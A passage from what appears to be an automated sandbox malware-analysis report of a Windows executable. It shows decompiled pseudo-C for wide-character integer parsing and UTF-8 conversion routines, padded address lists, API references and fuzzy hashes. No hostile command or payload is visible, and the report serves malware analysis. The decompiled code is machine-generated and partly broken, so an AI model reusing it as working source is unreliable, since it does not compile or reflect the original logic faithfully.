				_t253 = (( !=  ? r14d : 0xa) | 0xffffffff) % r14d;
				r12d = 0x30;
				r15d = 0xff10;
				r9d = 0xa / r14d;
				if (_t201 - r12w < 0) goto 0x35c58ef8;
				if (_t201 - 0x3a >= 0) goto 0x35c58d5a;
				goto 0x35c58ef3;
				if (_t201 - r15w >= 0) goto 0x35c58ee3;
				if (_t201 - r8w < 0) goto 0x35c58ef8;
				if (_t201 - 0x66a >= 0) goto 0x35c58d83;
				goto 0x35c58ef3;
				if (_t201 - r10w < 0) goto 0x35c58ef8;
				if (_t201 - 0x6fa >= 0) goto 0x35c58da2;
				goto 0x35c58ef3;
				if (_t201 - r11w < 0) goto 0x35c58ef8;
				if (_t201 - 0x970 >= 0) goto 0x35c58dc1;
				goto 0x35c58ef3;
				if (_t201 - 0x9e6 < 0) goto 0x35c58ef8;
				_t76 =  &(_t383[5]); // 0x9f0
				if (_t201 - _t76 >= 0) goto 0x35c58de1;
				goto 0x35c58ef3;
				if (_t201 - 0xa66 < 0) goto 0x35c58ef8;
				if (_t201 - _a16 < 0) goto 0x35c58dd7;
				if (_t201 - _v152 < 0) goto 0x35c58ef8;
				if (_t201 - _v148 < 0) goto 0x35c58dd7;
				if (_t201 - _v144 < 0) goto 0x35c58ef8;
				if (_t201 - _v140 < 0) goto 0x35c58dd7;
				if (_t201 - _v136 < 0) goto 0x35c58ef8;
				if (_t201 - _v132 < 0) goto 0x35c58dd7;
				if (_t201 - _v128 < 0) goto 0x35c58ef8;
				if (_t201 - _v124 < 0) goto 0x35c58dd7;
				if (_t201 - _v120 < 0) goto 0x35c58ef8;
				if (_t201 - _v116 < 0) goto 0x35c58dd7;
				if (_t201 - _v112 < 0) goto 0x35c58ef8;
				if (_t201 - _v108 < 0) goto 0x35c58dd7;
				if (_t201 - _v104 < 0) goto 0x35c58ef8;
				if (_t201 - _v100 < 0) goto 0x35c58dd7;
				if (_t201 - _v96 < 0) goto 0x35c58ef8;
				if (_t201 - _v92 < 0) goto 0x35c58dd7;
				if (_t201 - _v88 < 0) goto 0x35c58ef8;
				if (_t201 - _v84 < 0) goto 0x35c58dd7;
				if (_t201 - _v80 < 0) goto 0x35c58ef8;
				if (_t201 - _v76 < 0) goto 0x35c58dd7;
				if ((_t201 & 0x0000ffff) - _v72 - 9 > 0) goto 0x35c58ef8;
				goto 0x35c58ef3;
				if (_t201 - _v68 >= 0) goto 0x35c58ef8;
				if ((_t201 & 0x0000ffff) - r15d != 0xffffffff) goto 0x35c58f1b;
				_t100 = _t391 - 0x41; // -65
				_t101 = _t391 - 0x61; // -97
				_t186 = _t101;
				if (_t100 - 0x19 <= 0) goto 0x35c58f0b;
				if (_t186 - 0x19 > 0) goto 0x35c58f18;
				if (_t186 - 0x19 > 0) goto 0x35c58f13;
				goto 0x35c58f1b;
				_t406 =  *_t398;
				if (((_t201 & 0x0000ffff) + 0x1ffffffa9 | 0xffffffff) - r14d >= 0) goto 0x35c58f5f;
				_t202 =  *_t406 & 0x0000ffff;
				_t255 = _t383 + _t391;
				_t262 = _t255;
				_t107 =  &(_t406[1]); // 0x2
				r8d = 0x660;
				 *_t398 = _t107;
				_t259 = ( !=  ? _t256 : _t256 | 0x00000002) | (r13d & 0xffffff00 | _t255 - r13d * r14d > 0x00000000 | r13d & 0xffffff00 | _t261 - r9d > 0x00000000) << 0x00000002 | 0x00000008;
				goto 0x35c58d3f;
				_t410 = _a8;
				_t109 = _t406 - 2; // -2
				_t385 = _t109;
				_t408 = _v64;
				 *_t398 = _t385;
				if (_t202 == 0) goto 0x35c58f90;
				if ( *_t385 == _t202) goto 0x35c58f90;
				E00007FF77FF735C53B18(_t385);
				 *_t385 = 0x16;
				E00007FF77FF735C59400();
				if ((sil & 0x00000008) != 0) goto 0x35c58fac;
				_t386 = _t398[1];
				 *_t398 = _t408;
				if (_t386 == 0) goto 0x35c58fa5;
				 *_t386 = _t408;
				goto 0x35c59030;
				r8d = 0x80000000;
				_t114 = _t406 - 1; // -1
				r9d = _t114;
				if ((sil & 0x00000004) != 0) goto 0x35c58fd4;
				if ((sil & 0x00000001) == 0) goto 0x35c59017;
				if ((sil & 0x00000002) == 0) goto 0x35c58fcf;
				if (_t262 - r8d <= 0) goto 0x35c5901d;
				goto 0x35c58fd4;
				if (_t262 - r9d <= 0) goto 0x35c5901f;
				 *((char*)(_t410 + 0x30)) = 1;
				 *((intOrPtr*)(_t410 + 0x2c)) = 0x22;
				if ((_t259 & 0x00000001) != 0) goto 0x35c58fef;
				goto 0x35c5901f;
				_t396 = _t398[1];
				if ((_t259 & 0x00000002) == 0) goto 0x35c59007;
				if (_t396 == 0) goto 0x35c59002;
				 *_t396 =  *_t398;
				goto 0x35c59030;
				if (_t396 == 0) goto 0x35c59012;
				 *_t396 =  *_t398;
				goto 0x35c59030;
				if ((sil & 0x00000002) == 0) goto 0x35c5901f;
				_t397 = _t398[1];
				if (_t397 == 0) goto 0x35c5902e;
				 *_t397 =  *_t398;
				return  ~(_t262 | 0xffffffff);
			}





























































                                                                                                                                                                                                                              0x7ff735c588c4
                                                                                                                                                                                                                              0x7ff735c588c4
                                                                                                                                                                                                                              0x7ff735c588c4
                                                                                                                                                                                                                              0x7ff735c588c4
                                                                                                                                                                                                                              0x7ff735c588c9
                                                                                                                                                                                                                              0x7ff735c588e0
                                                                                                                                                                                                                              0x7ff735c588e3
                                                                                                                                                                                                                              0x7ff735c588e6
                                                                                                                                                                                                                              0x7ff735c588ea
                                                                                                                                                                                                                              0x7ff735c588ed
                                                                                                                                                                                                                              0x7ff735c588f5
                                                                                                                                                                                                                              0x7ff735c588fb
                                                                                                                                                                                                                              0x7ff735c588fd
                                                                                                                                                                                                                              0x7ff735c58902
                                                                                                                                                                                                                              0x7ff735c58908
                                                                                                                                                                                                                              0x7ff735c5890d
                                                                                                                                                                                                                              0x7ff735c58912
                                                                                                                                                                                                                              0x7ff735c58914
                                                                                                                                                                                                                              0x7ff735c5891b
                                                                                                                                                                                                                              0x7ff735c5891d
                                                                                                                                                                                                                              0x7ff735c58922
                                                                                                                                                                                                                              0x7ff735c58925
                                                                                                                                                                                                                              0x7ff735c58929
                                                                                                                                                                                                                              0x7ff735c5892c
                                                                                                                                                                                                                              0x7ff735c58937
                                                                                                                                                                                                                              0x7ff735c5893c
                                                                                                                                                                                                                              0x7ff735c58941
                                                                                                                                                                                                                              0x7ff735c58948
                                                                                                                                                                                                                              0x7ff735c58951
                                                                                                                                                                                                                              0x7ff735c58954
                                                                                                                                                                                                                              0x7ff735c5895e
                                                                                                                                                                                                                              0x7ff735c58963
                                                                                                                                                                                                                              0x7ff735c58966
                                                                                                                                                                                                                              0x7ff735c5896d
                                                                                                                                                                                                                              0x7ff735c5896f
                                                                                                                                                                                                                              0x7ff735c58974
                                                                                                                                                                                                                              0x7ff735c58976
                                                                                                                                                                                                                              0x7ff735c58980
                                                                                                                                                                                                                              0x7ff735c58992
                                                                                                                                                                                                                              0x7ff735c589a2
                                                                                                                                                                                                                              0x7ff735c589a5
                                                                                                                                                                                                                              0x7ff735c589ab
                                                                                                                                                                                                                              0x7ff735c589ad
                                                                                                                                                                                                                              0x7ff735c589b0
                                                                                                                                                                                                                              0x7ff735c589b3
                                                                                                                                                                                                                              0x7ff735c589b7
                                                                                                                                                                                                                              0x7ff735c589ba
                                                                                                                                                                                                                              0x7ff735c589ca
                                                                                                                                                                                                                              0x7ff735c589d7
                                                                                                                                                                                                                              0x7ff735c589e4
                                                                                                                                                                                                                              0x7ff735c589ec
                                                                                                                                                                                                                              0x7ff735c589f2
                                                                                                                                                                                                                              0x7ff735c589fa
                                                                                                                                                                                                                              0x7ff735c589fa
                                                                                                                                                                                                                              0x7ff735c589fe
                                                                                                                                                                                                                              0x7ff735c58a06
                                                                                                                                                                                                                              0x7ff735c58a0c
                                                                                                                                                                                                                              0x7ff735c58a14
                                                                                                                                                                                                                              0x7ff735c58a1a
                                                                                                                                                                                                                              0x7ff735c58a22
                                                                                                                                                                                                                              0x7ff735c58a2a
                                                                                                                                                                                                                              0x7ff735c58a32
                                                                                                                                                                                                                              0x7ff735c58a3a
                                                                                                                                                                                                                              0x7ff735c58a42
                                                                                                                                                                                                                              0x7ff735c58a4a
                                                                                                                                                                                                                              0x7ff735c58a52
                                                                                                                                                                                                                              0x7ff735c58a5a
                                                                                                                                                                                                                              0x7ff735c58a62
                                                                                                                                                                                                                              0x7ff735c58a6a
                                                                                                                                                                                                                              0x7ff735c58a72
                                                                                                                                                                                                                              0x7ff735c58a7a
                                                                                                                                                                                                                              0x7ff735c58a82
                                                                                                                                                                                                                              0x7ff735c58a8a
                                                                                                                                                                                                                              0x7ff735c58a95
                                                                                                                                                                                                                              0x7ff735c58aa7
                                                                                                                                                                                                                              0x7ff735c58ab0
                                                                                                                                                                                                                              0x7ff735c58aba
                                                                                                                                                                                                                              0x7ff735c58ac1
                                                                                                                                                                                                                              0x7ff735c58ac9
                                                                                                                                                                                                                              0x7ff735c58ad3
                                                                                                                                                                                                                              0x7ff735c58ae1
                                                                                                                                                                                                                              0x7ff735c58ae9
                                                                                                                                                                                                                              0x7ff735c58af2
                                                                                                                                                                                                                              0x7ff735c58b00
                                                                                                                                                                                                                              0x7ff735c58b08
                                                                                                                                                                                                                              0x7ff735c58b11
                                                                                                                                                                                                                              0x7ff735c58b1f
                                                                                                                                                                                                                              0x7ff735c58b27
                                                                                                                                                                                                                              0x7ff735c58b30
                                                                                                                                                                                                                              0x7ff735c58b3e
                                                                                                                                                                                                                              0x7ff735c58b46
                                                                                                                                                                                                                              0x7ff735c58b4e
                                                                                                                                                                                                                              0x7ff735c58b5c
                                                                                                                                                                                                                              0x7ff735c58b66
                                                                                                                                                                                                                              0x7ff735c58b72
                                                                                                                                                                                                                              0x7ff735c58b7d
                                                                                                                                                                                                                              0x7ff735c58b8a
                                                                                                                                                                                                                              0x7ff735c58b95
                                                                                                                                                                                                                              0x7ff735c58ba2
                                                                                                                                                                                                                              0x7ff735c58bad
                                                                                                                                                                                                                              0x7ff735c58bba
                                                                                                                                                                                                                              0x7ff735c58bc5
                                                                                                                                                                                                                              0x7ff735c58bd2
                                                                                                                                                                                                                              0x7ff735c58bdd
                                                                                                                                                                                                                              0x7ff735c58bea
                                                                                                                                                                                                                              0x7ff735c58bf5
                                                                                                                                                                                                                              0x7ff735c58c02
                                                                                                                                                                                                                              0x7ff735c58c09
                                                                                                                                                                                                                              0x7ff735c58c16
                                                                                                                                                                                                                              0x7ff735c58c1d
                                                                                                                                                                                                                              0x7ff735c58c2a
                                                                                                                                                                                                                              0x7ff735c58c31
                                                                                                                                                                                                                              0x7ff735c58c3e
                                                                                                                                                                                                                              0x7ff735c58c45
                                                                                                                                                                                                                              0x7ff735c58c5c
                                                                                                                                                                                                                              0x7ff735c58c5e
                                                                                                                                                                                                                              0x7ff735c58c6b
                                                                                                                                                                                                                              0x7ff735c58c75
                                                                                                                                                                                                                              0x7ff735c58c7a
                                                                                                                                                                                                                              0x7ff735c58c80
                                                                                                                                                                                                                              0x7ff735c58c80
                                                                                                                                                                                                                              0x7ff735c58c83
                                                                                                                                                                                                                              0x7ff735c58c88
                                                                                                                                                                                                                              0x7ff735c58c91
                                                                                                                                                                                                                              0x7ff735c58c96
                                                                                                                                                                                                                              0x7ff735c58c9b
                                                                                                                                                                                                                              0x7ff735c58c9d
                                                                                                                                                                                                                              0x7ff735c58ca0
                                                                                                                                                                                                                              0x7ff735c58ca6
                                                                                                                                                                                                                              0x7ff735c58ca9
                                                                                                                                                                                                                              0x7ff735c58ca9
                                                                                                                                                                                                                              0x7ff735c58cad
                                                                                                                                                                                                                              0x7ff735c58cb0
                                                                                                                                                                                                                              0x7ff735c58cb7
                                                                                                                                                                                                                              0x7ff735c58cbc
                                                                                                                                                                                                                              0x7ff735c58cc4
                                                                                                                                                                                                                              0x7ff735c58cc8
                                                                                                                                                                                                                              0x7ff735c58cce
                                                                                                                                                                                                                              0x7ff735c58cd3
                                                                                                                                                                                                                              0x7ff735c58cd5
                                                                                                                                                                                                                              0x7ff735c58cda
                                                                                                                                                                                                                              0x7ff735c58ce0
                                                                                                                                                                                                                              0x7ff735c58ce5
                                                                                                                                                                                                                              0x7ff735c58ceb
                                                                                                                                                                                                                              0x7ff735c58cf1
                                                                                                                                                                                                                              0x7ff735c58cf7
                                                                                                                                                                                                                              0x7ff735c58cf9
                                                                                                                                                                                                                              0x7ff735c58cff
                                                                                                                                                                                                                              0x7ff735c58d01
                                                                                                                                                                                                                              0x7ff735c58d05
                                                                                                                                                                                                                              0x7ff735c58d05
                                                                                                                                                                                                                              0x7ff735c58d09
                                                                                                                                                                                                                              0x7ff735c58d0c
                                                                                                                                                                                                                              0x7ff735c58d17
                                                                                                                                                                                                                              0x7ff735c58d21
                                                                                                                                                                                                                              0x7ff735c58d25
                                                                                                                                                                                                                              0x7ff735c58d2a
                                                                                                                                                                                                                              0x7ff735c58d2d
                                                                                                                                                                                                                              0x7ff735c58d2d
                                                                                                                                                                                                                              0x7ff735c58d30
                                                                                                                                                                                                                              0x7ff735c58d36
                                                                                                                                                                                                                              0x7ff735c58d3c
                                                                                                                                                                                                                              0x7ff735c58d43
                                                                                                                                                                                                                              0x7ff735c58d4d
                                                                                                                                                                                                                              0x7ff735c58d55
                                                                                                                                                                                                                              0x7ff735c58d5e
                                                                                                                                                                                                                              0x7ff735c58d68
                                                                                                                                                                                                                              0x7ff735c58d76
                                                                                                                                                                                                                              0x7ff735c58d7e
                                                                                                                                                                                                                              0x7ff735c58d87
                                                                                                                                                                                                                              0x7ff735c58d95
                                                                                                                                                                                                                              0x7ff735c58d9d
                                                                                                                                                                                                                              0x7ff735c58da6
                                                                                                                                                                                                                              0x7ff735c58db4
                                                                                                                                                                                                                              0x7ff735c58dbc
                                                                                                                                                                                                                              0x7ff735c58dc9
                                                                                                                                                                                                                              0x7ff735c58dcf
                                                                                                                                                                                                                              0x7ff735c58dd5
                                                                                                                                                                                                                              0x7ff735c58ddc
                                                                                                                                                                                                                              0x7ff735c58de9
                                                                                                                                                                                                                              0x7ff735c58df7
                                                                                                                                                                                                                              0x7ff735c58e00
                                                                                                                                                                                                                              0x7ff735c58e0b
                                                                                                                                                                                                                              0x7ff735c58e14
                                                                                                                                                                                                                              0x7ff735c58e1f
                                                                                                                                                                                                                              0x7ff735c58e28
                                                                                                                                                                                                                              0x7ff735c58e33
                                                                                                                                                                                                                              0x7ff735c58e3c
                                                                                                                                                                                                                              0x7ff735c58e47
                                                                                                                                                                                                                              0x7ff735c58e50
                                                                                                                                                                                                                              0x7ff735c58e5b
                                                                                                                                                                                                                              0x7ff735c58e68
                                                                                                                                                                                                                              0x7ff735c58e73
                                                                                                                                                                                                                              0x7ff735c58e80
                                                                                                                                                                                                                              0x7ff735c58e87
                                                                                                                                                                                                                              0x7ff735c58e94
                                                                                                                                                                                                                              0x7ff735c58e9b
                                                                                                                                                                                                                              0x7ff735c58ea8
                                                                                                                                                                                                                              0x7ff735c58eaf
                                                                                                                                                                                                                              0x7ff735c58ebc
                                                                                                                                                                                                                              0x7ff735c58ec3
                                                                                                                                                                                                                              0x7ff735c58eda
                                                                                                                                                                                                                              0x7ff735c58ee1
                                                                                                                                                                                                                              0x7ff735c58eeb
                                                                                                                                                                                                                              0x7ff735c58ef6
                                                                                                                                                                                                                              0x7ff735c58efb
                                                                                                                                                                                                                              0x7ff735c58f01
                                                                                                                                                                                                                              0x7ff735c58f01
                                                                                                                                                                                                                              0x7ff735c58f04
                                                                                                                                                                                                                              0x7ff735c58f09
                                                                                                                                                                                                                              0x7ff735c58f0e
                                                                                                                                                                                                                              0x7ff735c58f16
                                                                                                                                                                                                                              0x7ff735c58f1b
                                                                                                                                                                                                                              0x7ff735c58f21
                                                                                                                                                                                                                              0x7ff735c58f23
                                                                                                                                                                                                                              0x7ff735c58f2d
                                                                                                                                                                                                                              0x7ff735c58f3e
                                                                                                                                                                                                                              0x7ff735c58f45
                                                                                                                                                                                                                              0x7ff735c58f4c
                                                                                                                                                                                                                              0x7ff735c58f55
                                                                                                                                                                                                                              0x7ff735c58f58
                                                                                                                                                                                                                              0x7ff735c58f5a
                                                                                                                                                                                                                              0x7ff735c58f5f
                                                                                                                                                                                                                              0x7ff735c58f67
                                                                                                                                                                                                                              0x7ff735c58f67
                                                                                                                                                                                                                              0x7ff735c58f6b
                                                                                                                                                                                                                              0x7ff735c58f73
                                                                                                                                                                                                                              0x7ff735c58f79
                                                                                                                                                                                                                              0x7ff735c58f7e
                                                                                                                                                                                                                              0x7ff735c58f80
                                                                                                                                                                                                                              0x7ff735c58f85
                                                                                                                                                                                                                              0x7ff735c58f8b
                                                                                                                                                                                                                              0x7ff735c58f94
                                                                                                                                                                                                                              0x7ff735c58f96
                                                                                                                                                                                                                              0x7ff735c58f9a
                                                                                                                                                                                                                              0x7ff735c58fa0
                                                                                                                                                                                                                              0x7ff735c58fa2
                                                                                                                                                                                                                              0x7ff735c58fa7
                                                                                                                                                                                                                              0x7ff735c58fac
                                                                                                                                                                                                                              0x7ff735c58fb2
                                                                                                                                                                                                                              0x7ff735c58fb2
                                                                                                                                                                                                                              0x7ff735c58fba
                                                                                                                                                                                                                              0x7ff735c58fc0
                                                                                                                                                                                                                              0x7ff735c58fc6
                                                                                                                                                                                                                              0x7ff735c58fcb
                                                                                                                                                                                                                              0x7ff735c58fcd
                                                                                                                                                                                                                              0x7ff735c58fd2
                                                                                                                                                                                                                              0x7ff735c58fd6
                                                                                                                                                                                                                              0x7ff735c58fde
                                                                                                                                                                                                                              0x7ff735c58fe8
                                                                                                                                                                                                                              0x7ff735c58fed
                                                                                                                                                                                                                              0x7ff735c58fef
                                                                                                                                                                                                                              0x7ff735c58ff5
                                                                                                                                                                                                                              0x7ff735c58ffa
                                                                                                                                                                                                                              0x7ff735c58fff
                                                                                                                                                                                                                              0x7ff735c59005
                                                                                                                                                                                                                              0x7ff735c5900a
                                                                                                                                                                                                                              0x7ff735c5900f
                                                                                                                                                                                                                              0x7ff735c59015
                                                                                                                                                                                                                              0x7ff735c5901b
                                                                                                                                                                                                                              0x7ff735c5901f
                                                                                                                                                                                                                              0x7ff735c59026
                                                                                                                                                                                                                              0x7ff735c5902b
                                                                                                                                                                                                                              0x7ff735c5904a

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.454572575.00007FF735C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF735C40000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454563406.00007FF735C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454600190.00007FF735C69000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454618472.00007FF735C7B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454618472.00007FF735C8A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454637784.00007FF735C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454637784.00007FF735C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff735c40000_PAP46E1UkZ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                              • String ID: 0$f$p$p
                                                                                                                                                                                                                              • API String ID: 3215553584-1202675169
                                                                                                                                                                                                                              • Opcode ID: fc16ac6844d081919a7aff2aa96d4daedb12bf275e47b2b3e28f0ae787938feb
                                                                                                                                                                                                                              • Instruction ID: a61091ce3dc467626b7d12c7cd2fbd6356b1c2e7ff2c048aafd00bf09520ab09
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: fc16ac6844d081919a7aff2aa96d4daedb12bf275e47b2b3e28f0ae787938feb
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 321208A3E0D14BA5FB207A96D044679F2A1FB40F58FE44935E69947AC4CF3CE480EB24
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 00007FF735C46F20 Relevance: 12.4, APIs: 2, Strings: 5, Instructions: 104COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF735C4101D), ref: 00007FF735C46FBF
                                                                                                                                                                                                                              • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF735C4101D), ref: 00007FF735C4700F
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.454572575.00007FF735C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF735C40000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454563406.00007FF735C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454600190.00007FF735C69000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454618472.00007FF735C7B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454618472.00007FF735C8A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454637784.00007FF735C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454637784.00007FF735C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff735c40000_PAP46E1UkZ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ByteCharMultiWide
                                                                                                                                                                                                                              • String ID: Failed to encode wchar_t as UTF-8.$Failed to get UTF-8 buffer size.$Out of memory.$WideCharToMultiByte$win32_utils_to_utf8
                                                                                                                                                                                                                              • API String ID: 626452242-27947307
                                                                                                                                                                                                                              • Opcode ID: aa94844acd0e2992d55a782485d5bcb84ea1eb60e337c6ba43c62b549bb0b5c2
                                                                                                                                                                                                                              • Instruction ID: 5c84fb9e088a23517bb5a517878ca0e560eb62a2021456fd05038779839b588b
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: aa94844acd0e2992d55a782485d5bcb84ea1eb60e337c6ba43c62b549bb0b5c2
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7A41E173A09B9392D620EF11A44057AF7A5FB88F98F944235DA8D43B94DF3CD052E710
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 00007FF735C47360 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 63COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00007FF735C43A55,?,00007FF735C435DC), ref: 00007FF735C473A1
                                                                                                                                                                                                                                • Part of subcall function 00007FF735C426D0: GetLastError.KERNEL32(00000000,00000000,00000000,00007FF735C47063,?,?,?,?,?,?,?,?,?,?,?,00007FF735C4101D), ref: 00007FF735C42704
                                                                                                                                                                                                                                • Part of subcall function 00007FF735C426D0: MessageBoxW.USER32 ref: 00007FF735C427DC
                                                                                                                                                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00007FF735C43A55,?,00007FF735C435DC), ref: 00007FF735C47415
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.454572575.00007FF735C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF735C40000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454563406.00007FF735C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454600190.00007FF735C69000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454618472.00007FF735C7B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454618472.00007FF735C8A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454637784.00007FF735C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454637784.00007FF735C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff735c40000_PAP46E1UkZ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ByteCharMultiWide$ErrorLastMessage
                                                                                                                                                                                                                              • String ID: Failed to encode wchar_t as UTF-8.$Failed to get UTF-8 buffer size.$Out of memory.$WideCharToMultiByte$win32_utils_to_utf8
                                                                                                                                                                                                                              • API String ID: 3723044601-27947307
                                                                                                                                                                                                                              • Opcode ID: 9185edfc61e69b7f0093ca37c2880fde096e5fafad94c64ce3a33e0a2ee46823
                                                                                                                                                                                                                              • Instruction ID: 0bd040e5a7eefbe54e542056dfe8523b7737491fd8fdc7d023919553179f3a1f
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9185edfc61e69b7f0093ca37c2880fde096e5fafad94c64ce3a33e0a2ee46823
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A521D262B18B53A5EB10EF15A840479F7A2EB84F88FD85235CA0D43754EF7CE5019310
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 00007FF735C4FA3C Relevance: 11.0, APIs: 3, Strings: 3, Instructions: 475COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              C-Code - Quality: 58%
                                                                                                                                                                                                                              			E00007FF77FF735C4FA3C(signed short* __rax, long long __rbx, long long __rcx, signed short** __rdx, void* __r8, long long _a8, intOrPtr _a16, long long _a24) {
				void* _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				intOrPtr _v88;
				intOrPtr _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				intOrPtr _v104;
				intOrPtr _v108;
				intOrPtr _v112;
				intOrPtr _v116;
				intOrPtr _v120;
				intOrPtr _v124;
				intOrPtr _v128;
				intOrPtr _v132;
				intOrPtr _v136;
				intOrPtr _v140;
				intOrPtr _v144;
				intOrPtr _v148;
				intOrPtr _v152;
				long long _v160;
				long long _v168;
				void* __rsi;
				void* __rbp;
				signed int _t134;
				void* _t154;
				void* _t184;
				signed short _t197;
				signed short _t198;
				signed int _t199;
				signed int _t246;
				signed int _t248;
				signed int _t250;
				signed int _t254;
				signed int _t257;
				signed short* _t371;
				signed short* _t372;
				signed short* _t374;
				signed short** _t375;
				long long _t376;
				long long* _t379;
				signed short* _t380;
				signed short* _t381;
				signed short** _t385;
				long long* _t386;
				long long* _t387;
				signed short** _t388;
				void* _t389;
				signed short* _t394;
				signed short* _t395;
				long long _t396;
				intOrPtr _t397;
				long long _t398;
				signed short* _t399;

				_t393 = __r8;
				_t385 = __rdx;
				_t376 = __rbx;
				_a24 = __rbx;
				_a8 = __rcx;
				_t398 =  *__rdx;
				r12d = 0;
				_v64 = _t398;
				r14d = r8d;
				_t388 = __rdx;
				if (_t398 != 0) goto 0x35c4fa83;
				E00007FF77FF735C53B18(__rax);
				 *__rax = 0x16;
				E00007FF77FF735C59400();
				goto 0x35c4fab5;
				if (r14d == 0) goto 0x35c4facd;
				_t4 = _t393 - 2; // 0xe
				if (_t4 - 0x22 <= 0) goto 0x35c4facd;
				_v160 = __rcx;
				r9d = 0;
				 *((char*)(__rcx + 0x30)) = 1;
				r8d = 0;
				 *(__rcx + 0x2c) = 0x16;
				_v168 = _t396;
				E00007FF77FF735C59330(__rax, __rbx, __rcx, __rdx, __rdx, _t389, __r8);
				_t379 = _t388[1];
				if (_t379 == 0) goto 0x35c500ed;
				 *_t379 =  *_t388;
				goto 0x35c500ed;
				_t380 = _t398 + 2;
				_t134 = r9b & 0xffffffff;
				_t256 = r12d;
				 *_t385 = _t380;
				_t253 =  !=  ? _t134 : _t134 | 0x00000002;
				if ((0x0000fffd & _t376 - 0x0000002b) != 0) goto 0x35c4fb02;
				_t197 =  *_t380 & 0x0000ffff;
				_t371 =  &(_t380[1]);
				 *_t388 = _t371;
				_a16 = 0xa70;
				_v152 = 0xae6;
				_v148 = 0xaf0;
				_v144 = 0xb66;
				r8d = 0x660;
				_v140 = 0xb70;
				_t20 = _t371 - 0x80; // 0x5e0
				r9d = _t20;
				_v136 = 0xc66;
				r10d = 0x6f0;
				_v132 = 0xc70;
				r11d = 0x966;
				_v128 = 0xce6;
				_v124 = 0xcf0;
				_v120 = 0xd66;
				_v116 = 0xd70;
				_v112 = 0xe50;
				_v108 = 0xe5a;
				_v104 = 0xed0;
				_v100 = 0xeda;
				_v96 = 0xf20;
				_v92 = 0xf2a;
				_v88 = 0x1040;
				_v84 = 0x104a;
				_v80 = 0x17e0;
				_v76 = 0x17ea;
